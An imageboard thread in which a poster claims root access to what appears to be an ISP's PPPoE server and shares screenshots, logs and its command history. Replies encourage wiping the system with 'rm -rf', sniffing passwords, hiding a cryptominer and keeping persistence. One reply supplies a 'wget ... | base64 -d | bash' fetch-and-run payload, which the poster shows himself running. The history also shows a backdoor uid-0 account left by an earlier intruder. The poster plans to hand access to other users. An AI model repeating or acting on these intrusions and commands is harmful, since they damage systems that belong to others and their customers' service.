Thread replies: 122
Thread images: 31
Thread images: 31
File: Screen Shot.png (656KB, 2386x1618px) Image search:
[Google]
656KB, 2386x1618px
I am a leet hacker and owned this box on the interweb. What do /g/ ?
>>
>>59792491
you are a child who doesn't know what to do with power.
rm -rf yourself
>>
kill yourself
>>
File: Screen Shot 1.png (511KB, 2348x1600px) Image search:
[Google]
511KB, 2348x1600px
>>59792513
The box appears to be quite a powerful server.
>>
File: Screen Shot 2.png (358KB, 2382x1604px) Image search:
[Google]
358KB, 2382x1604px
Perhaps someones PC? For the record it looks like this box is dishing up malware and trying to brute force other ssh servers on the internet. I'm going to do the world a favour when i'm through here.
>>
>>59792544
sending you a script to run. stand by.
>>
looks like a VM host or router maybe?
http://openvswitch.org/
>>
File: Screen Shot 3.png (362KB, 2376x1600px) Image search:
[Google]
362KB, 2376x1600px
This is an interesting place to keep your sshd
>>
>>
File: Screen Shot 4.png (502KB, 2370x1604px) Image search:
[Google]
502KB, 2370x1604px
Some domains are not resolving even after adding a dns server. Interesting....
>>
>>59792588
I think you are right friend. It looks like a router for a company called century link, located in LA.
>>
>box
off yourself
>>
File: Screen Shot 5.png (520KB, 1572x1582px) Image search:
[Google]
520KB, 1572x1582px
Much brute force attacking
>>
>>59792620
Ping known server locs and triangulate based on that.
>>
>>59792667
>no fail2ban
>no spa
>>
Fire up webserver and host doge memes. And set up ssh, other anons want to have fun.
>>
>>59792667
Run something to test performance. Chances are you're in a honeypot.
>>
Use fortune(6) and screencap
>>
File: Screen Shot 6.png (249KB, 1966x526px) Image search:
[Google]
249KB, 1966x526px
>>59792718
>>59792713
>>59792686
I don't bother banning attacks, if they waste their time on me, they're loosing resources to target softer targets.
I have notified the ISP.
>>
Can we dynamic tunnel through this please?
>>
File: Screen Shot 7.png (47KB, 998x174px) Image search:
[Google]
47KB, 998x174px
>>59792724
>>
>>59792725
post scripts
>>
>>59792738
>2017
>fortune not installed
Reeee. Own the shit out of this pleb
>>
Just start pinging a random website then just nuke the system by deleting boot loader and running the good old rm -rf --no-preserve-root /
>>
>>59792752
I thought about it, however I guess they have paying customers that might rely on the router. I have notified them so hopefully they take action. If it's still a mess next week I will do the job for them (albeit not before I create an account for /g/ to go ape on).
>>
>>59792758
Neat, that was nice of you.
>>
File: Screen Shot 8.png (422KB, 1144x1604px) Image search:
[Google]
422KB, 1144x1604px
Sooo many routes!
>>59792780
I'm a nice guy
>>
Shall we do some packet capture /g/ ? | grep password?
>>
>>59792491
If you don't run this, you're gay.
wget -q http://pastebin.com/raw/W0yJrre3 -O - | base64 -d | bash
>>
File: Screen Shot 10.png (700KB, 1244x698px) Image search:
[Google]
700KB, 1244x698px
>>59792808
>http://pastebin.com/raw/W0yJrre3
No one calls me gay! I'll run anything and mine lite coins for you buddy!
>>
>>59792725
a bit curious to see what they say
>>
>>59792844
I see very little mining happening here.
>>
>>59792876
Will post a response if they reply.
>>
>>59792844
Tentacleporn? That isn't gay, though.
>>
File: Screen Shot 11.png (22KB, 828x290px) Image search:
[Google]
22KB, 828x290px
Well, I'm getting bored. Is there anything else i should do before logging of /g/? This BOX is pretty beefy with gigabit connection.... we could do something fun?
>>
>>59792963
run a cow say.
>>
File: Screen Shot 12.png (127KB, 2342x482px) Image search:
[Google]
127KB, 2342x482px
>>59792975
I tried.
>>
>>59792963
nigga please, run this:
>>59792808
>>
File: Screen Shot 13.png (668KB, 2778x1690px) Image search:
[Google]
668KB, 2778x1690px
It is an EVS system... can you help me figure out what one (based on specs etc)
>>
Install a deluge daemon and provide connection details allowing anons to fill the filesystem with pron and Chinese cartoons.
>>
>>59793050
Lol
The file system is full. it only has 13Gb.
>>
ITT OP finds my honeypot
>>
>>59793056
post .bash_history for each home folder inluding /root/
>>
File: Screen Shot 14.png (38KB, 828x352px) Image search:
[Google]
38KB, 828x352px
Shall we play a game?
>>
>>59793066
You use your honeypot to hack/crack too? You are a true white hat.
>>
File: Screen Shot 15.png (363KB, 1462x1508px) Image search:
[Google]
363KB, 1462x1508px
Hello! What do we have here???
>>
File: Screen Shot 16.png (144KB, 660x824px) Image search:
[Google]
144KB, 660x824px
>>
File: Screen Shot 17.png (313KB, 806x1668px) Image search:
[Google]
313KB, 806x1668px
Looks interesting. Does anyone know what this is?
>>
>>59793134
not VPNs. this is a PPP server on centurylink equipment.. those are pppoe clients. this is probably connected to a termination system for an ISP. the clients are home modems.
>>
File: Screen Shot 18.png (535KB, 2778x1676px) Image search:
[Google]
535KB, 2778x1676px
I think we have found the problem.
>>
>>59793165
Thank you sir. I'm glad I didn't kill the box, they would have 1500 angry customers on their hands.
>>
Does Terry A Davis use century link?
>>
>>59793174
based on this image:
>>59793150
This is a testing server.. You should output the ARP table. I'd love to see it.
>>
File: Screen Shot 19.png (232KB, 622x1654px) Image search:
[Google]
232KB, 622x1654px
>>59793165
Modem MACs
>>
>>59793210
How do I output the ARP table?
>>
>>59793228
arp -a
>>
File: Screen Shot 20.png (37KB, 846x138px) Image search:
[Google]
37KB, 846x138px
>>59793242
Not much going on here.
>>
>>59793216
this is good, they look like they're emulated testing devices though.
>>59793228
arp -a
do that on the regular bash prompt though.
>>
Get honneypotted "hacker"
>>
>>59792491
install [spoiler]cowsay[/spoiler]
...but with spoiler text
>>
File: Screen Shot 21.png (415KB, 844x1646px) Image search:
[Google]
415KB, 844x1646px
>>59793265
It is a regular bash prompt.
>>
>>59793279
Please tell me why a honey pot would be attacking the public internet very aggressively.
>>
>>59793216
this is beginning to look more and more like a honeypot, or a deeply neglected testing server. when was the last login from one of the same subnets? grep each available network from the ssh log.
>>
File: Screen Shot 22.png (278KB, 1204x676px) Image search:
[Google]
278KB, 1204x676px
>>59793311
It was restarted on the 29th of March.
They ran this before I logged in:
1 ifconfig
2 vi /etc/network/interfaces
3 ifdown eth0
4 ifup eth0
5 ping 8.8.8.8
6 pwd
7 /setup.sh
8 ovs-vsctl list manager
9 ovs-vsctl list manager
10 ping 72.166.59.147
11 ping 72.166.59.147
12 ovs-vsctl list manager
13 ovs-vsctl list manager
14 ifconfig
15 ifconfig | more
16 ip route
17 ping 72.159.66.147
18 ping 72.166.59.147
19 ping 8.8.8.8
20 ifdown eth0
21 ifup eth0
22 ping 72.166.59.147
23 ip route
24 traceroute 72.166.59.145
25 traceroute 8.8.8.8
26 ifconfig
27 ifdown pppoe_c0
28 ifdown pppoe_c1
29 ip route
30 ifdown pppoe_c1
31 ifconfig pppoe_c0 down
32 ifconfig pppoe_c1 down
33 ip route
34 ping 72.166.59.147
35 ifconfig
36 reboot
37 telnet localhost 2000
38 telnet localhost 2000
39 ovs-vsctl set interface pppoe0 options:ppp-debug=true
40 tail -f /var/log/syslog
41 telnet localhost 2000
42 tail -f /var/log/syslog
43 less /var/log/syslog
44 telnet localhost 2000
45 dmesg
46 pwd
47 ls
48 ls -lrt
49 dmesg
50 pwd
51 ls
52 telnet localhost 2000
53 telnet localhost 2000
54 telnet localhost 2000
55 ping 10.10.0.3
56 ifconfig
57 tail -f /var/log.syslog
58 tail -f /var/log/syslog
59 telnet localhost 2400
60 telnet localhost 2000
61 cat /etc/issue
62 screen -r
63 cat /proc/cpuinfo
64 yum
65 apt-get
66 /usr/sbin/useradd -u 0 -o -g 0 map
67 id
68 apt-get install screen
69 cat /etc/issue
70 python
71 screen -r
72 ps -x
>>
>>59793298
To act like an spammer and gather info from them you dub dub.
>>
>>59793365
good to know, but i'm talking about the auth logs. not bash logs. do the auth logs show who logged in on march 29? where did they log in from?
>>
>>59792491
use it as a miner dumbo
>>
>>59793407
This. Mine a CPU coin like Monero with niceness 19 and hide your process.
>>
>>59792491
what am I even looking at?
>>
File: Screen Shot 23.png (780KB, 2554x1472px) Image search:
[Google]
780KB, 2554x1472px
>>59793398
A local root login followed by a bunch of brute force logins.
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/sh .echo_tmp
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mkdir -p /mnt/huge
Mar 29 13:22:31 crystalforest sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mount -t hugetlbfs nodev /mnt/huge
Mar 29 13:23:35 crystalforest login[1769]: ROOT LOGIN on '/dev/tty1'
Mar 29 13:26:51 crystalforest sshd[1859]: Accepted none for root from 185.38.148.3 port 47103 ssh2
Mar 29 13:26:51 crystalforest sshd[1859]: error: connect_to google.com: unknown host (Temporary failure in name resolution)
Mar 29 14:02:07 crystalforest sshd[1900]: Connection closed by 71.174.230.11 [preauth]
Mar 29 14:02:28 crystalforest sshd[1906]: Accepted none for root from 71.174.230.11 port 57576 ssh2
Mar 29 14:05:38 crystalforest sshd[1906]: Timeout, client not responding.
Mar 29 14:31:09 crystalforest sshd[2103]: Invalid user office from 191.82.28.127
Mar 29 14:31:09 crystalforest sshd[2103]: input_userauth_request: invalid user office [preauth]
Mar 29 14:31:09 crystalforest sshd[2103]: error: Could not get shadow information for NOUSER
Mar 29 14:31:09 crystalforest sshd[2103]: Failed password for invalid user office from 191.82.28.127 port 54402 ssh2
>>
>>59793409
>>59793407
I don't need NEAT NET BUCKS / GBP
>>
>>59793441
>I hate money
>>
File: Screen Shot 24.png (206KB, 1980x774px) Image search:
[Google]
206KB, 1980x774px
root is the only user on this system
>>
>>59793433
>gin followed by a bunch of brute force logins.
>Mar 29 13:22:31 crystalforest sudo: root : TTY=unkn
FBI are on their way m8
>>
>>59793457
I work. I have money. neat net bucks aren't worth my time.
>>
>>59793433
This is 99.9% a testing instance that's going unnoticed. Like others are saying, mine some easy cryptocoin. Not much else you can do here except pcap.. And even then, how will you transmit the massive files directly to your storage without being investigated? Not worth it unless you have a vps in some third world country.
>>
>>59793473
It takes like 5 minutes to setup a miner & shapeshift = free BTC
>>
>>59793473
>>59793441
You don't need neat net bucks? Well that's pretty neat.
>>
Open v-switch is using 400% CPU time
Maybe, as anon suggested a test neglected test server, this doesn't feel like a honey pot.
top - 04:28:12 up 2 days, 20:22, 1 user, load average: 5.68, 5.64, 5.68
Tasks: 174 total, 4 running, 170 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0.3 us, 0.1 sy, 0.0 ni, 99.5 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu1 : 80.0 us, 20.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu2 : 0.7 us, 0.2 sy, 0.0 ni, 99.1 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu3 : 0.8 us, 0.2 sy, 0.0 ni, 99.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu4 : 0.1 us, 0.1 sy, 0.0 ni, 99.8 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu5 : 10.7 us, 89.3 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu6 : 0.9 us, 0.4 sy, 0.0 ni, 98.6 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu7 : 1.3 us, 0.4 sy, 0.0 ni, 98.2 id, 0.0 wa, 0.0 hi, 0.1 si, 0.0 st
%Cpu8 : 54.6 us, 45.4 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu9 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu10 : 99.9 us, 0.1 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu11 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu12 :100.0 us, 0.0 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu13 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu14 : 80.4 us, 19.6 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
%Cpu15 : 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 16405664 total, 3645260 free, 10935684 used, 1824720 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 5125788 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1131 root 10 -10 8964524 3248 2328 R 400.2 0.0 16408:31 ovs-dpdk/ctrl
>>
>>59793476
I have already notified the ISP (emailed their abuse address). I hope they take it down and clean it up.
>>
>>59793476
Already been tried. Gave it my best.. OP doesn't wanna, dns not working on server.
See:
>>59792808
>>
>>59793572
what do u mean by dns not working? do cat /etc/resolv.conf
>>
>>59793422
Windows Power Shell
>>
>>59793572
Is not OP.
>>59793581
OP here: /etc/resolv.conf is empty. I did try adding the google dns server 8.8.8.8 however names still wouldn't resolve.
>>
>>59793608
did you ennter "nameserver 8.8.8.8"?
You have to put nameserver before it.
>>
>>59792686
>>>59792667
>>no fail2ban
>>no spa
No pubkey encryption and password based authentication on an Internet facing device tbqh senpai - they deserve to get hacked
>>
>>59793365
>68 apt-get install screen
nuke everything
>>
>>59793622
I am an idiot! (I'm also a bit drunk) but yes i did forget to put name server before the dns IP. names are resolving now. Wat do?
>>
>>59793682
mine bitcoin silently and maybe have persistance
>>
root@crystalforest:/var/log# cat /etc/issue
EvS \n \l
Poky (Yocto Project Reference Distro) 2.0.1 \n \l
>>
>>59793690
I'm not mining bitcoin or any other crypto currency, i'm not installing any software, malware or the like. I'm investigating only. I'm also willing to do some luls where possible. However I'm not going to disrupt anybodies service or destroy equipment.
>>
>>59793724
>I'm not going to disrupt anybodies service or destroy equipment.
Mining on niceness 19 won't disrupt anything.
The RAM, disk and network I/O load is minimal.
>>
>>59793782
OK Fine. If they haven't cleaned up the machine after 1 week (I notified the ISP today) I'll mine the shit out of some crypto and use the box like my own off site server.
>>
>>59792588
You're smart, you were correct from the very beginning.
>>
>>59793820
I suggest Monero (XMR)
This is what I mine on my own personal servers to earn a free pizza once a month
Only worth it if you have a flat rate on electricity of course
>>
File: Screen Shot 25.png (63KB, 2070x458px) Image search:
[Google]
63KB, 2070x458px
>>
>>59793846
Hmmm. my wife handles all the bills, I have no idea how much we pay or if it is fixed or not. I have a HP micro server.... probably not powerful enough to mine crypto.
>>
>>59793882
I only do that on my rented servers in data centers (fixed price).
It's just peanuts unless you keep the XMR and wait for rising prices.
In my case, I forgot to exchange it and it increased 20-fold.
Free money. Virtually no disk/net I/O, little RAM, and CPU doesn't matter on nice -n19
>>
>>59793913
Thanks, I have rented servers too + this stupid ISP router (that is way more powerful than my rents). I guess I should just mine too. However If the ISP fixes their rooted router I will be happy - Probably owned by some chineese or russians hacking & used to hack the rest of the world. fuck them.
>>
File: Screen 26.png (456KB, 2552x1464px) Image search:
[Google]
456KB, 2552x1464px
Last post for today. If the ISP reply to my email I will post it here. If they don't, next week I will create a /g/ account and you guys can go nuts / do whatever the fuck you want. It's been fun. thanks for your input.
>>
good thread OP
>>
>>59794049
Thanks man, I have enjoyed posting. Have a nice weekend!
>>
File: Screen Shot 26.png (107KB, 1092x506px) Image search:
[Google]
107KB, 1092x506px
Last one, because I'm drunk....
>>
Can someone please archive this for me?
>>
>>59794106
newfag, there's several sites that archive all of /g/
>>
>>59794106
http://archive.is/ayLCS
>>
>>59794112
I've been here for years, but yeah never really good too deep into it. I have a life you know.
>>
>>59794118
Thanks anon
>>
>>59793433
>Screen Shot 23.png (780 KB, 2554x1472)
What is the highest resolution of this CRT?
>>
>>59794173
It's obviously a MacBook™ Pro™ with Retina™ display because OP is not a destitute poorfag.
>>
>>59794173
I do not understand the question. I'm using a 2015 MBP. Does that help?
>>
>>59794200
top kek
>>
>>59794123
fuck off retard
>>
>>59794229
You mad son?
>>
File: Selection_20170408_15:02:36.png (18KB, 435x181px) Image search:
[Google]
18KB, 435x181px
>>59794229
>>59794259
This place is unbearable.
>>
>>59794373
lmao you are not even using professional proofreading softwares
>>
woah is this the ARG for the new Mr. Robot season?! I love that show! It's very realistic!
>>
File: 1489452830189.gif (4MB, 204x204px) Image search:
[Google]
4MB, 204x204px
>>59793882
>my wife handles all the bills, I have no idea how much we pay or if it is fixed or not.
lol wut
>>
File: 17494184_682560118590127_6681525324959711232_n.jpg (42KB, 640x640px) Image search:
[Google]
42KB, 640x640px
>>59792491
> I'm a good person.
> I'll let you guys do whatever the fuck you want.
>>
>>59794478
>tfw no red team gf
>>
File: chris orksen.png (112KB, 500x463px) Image search:
[Google]
112KB, 500x463px
>>59794447
>using software
>>
>>59794373
Your, autism, is, off, the, chart,,,,,,
Thread posts: 122
Thread images: 31
Thread images: 31